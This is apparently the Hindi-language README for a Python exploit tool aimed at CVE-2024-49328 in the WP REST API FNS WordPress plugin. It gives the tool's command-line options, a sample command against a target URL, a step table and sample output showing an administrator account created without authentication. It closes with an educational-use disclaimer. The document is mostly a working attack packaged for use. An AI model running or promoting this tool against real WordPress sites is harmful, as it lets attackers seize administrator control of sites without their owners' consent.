
WP REST API FNS वर्डप्रेस प्लगइन में विशेषाधिकार वृद्धि भेद्यता का फायदा उठाने के लिए पायथन स्क्रिप्ट, जो बिना प्रमाणीकरण के प्रशासक खातों के निर्माण की अनुमति देती है।
यह स्क्रिप्ट WordPress के लिए WP REST API FNS Plugin में एक privilege escalation भेद्यता का शोषण करती है। यह भेद्यता 1.0.0 तक के सभी संस्करणों को प्रभावित करती है, जिससे unauthenticated हमलावरों को एडमिनिस्ट्रेटर विशेषाधिकार प्राप्त करने की अनुमति मिलती है।
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
-e NEWEMAIL, --Newemail NEWEMAIL New email to register
-p PASSWORD, --password PASSWORD Password for the new user
उदाहरण कमांड:
python CVE-2024-49328.py -u http://targetsite.com -e [email protected] -p password123
| चरण | विवरण | आइकन |
|---|---|---|
| चरण 1 | प्लगइन के संस्करण को सत्यापित करें। | 📝 |
| चरण 2 | जाँचें कि क्या संस्करण exploitable है (1.0.0, या उससे कम)। | ✅ |
| चरण 3 | भेद्यता का शोषण करें और एक नया admin उपयोगकर्ता पंजीकृत करें। | 🔒 |
| चरण 4 | सत्यापन के लिए उपयोगकर्ता क्रेडेंशियल्स के साथ परिणाम प्रिंट करें। | 🎉 |
Found Stable tag version: 1.0.0
Version 1.0.0 is exploitable.
Exploiting the site... Please wait.
Successfully
Username: [email protected]
Password: nxploit
pip install requests
🚨 चेतावनी:
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। स्पष्ट अनुमति के बिना सिस्टम के खिलाफ इस स्क्रिप्ट का अनधिकृत उपयोग अवैध और अनैतिक है।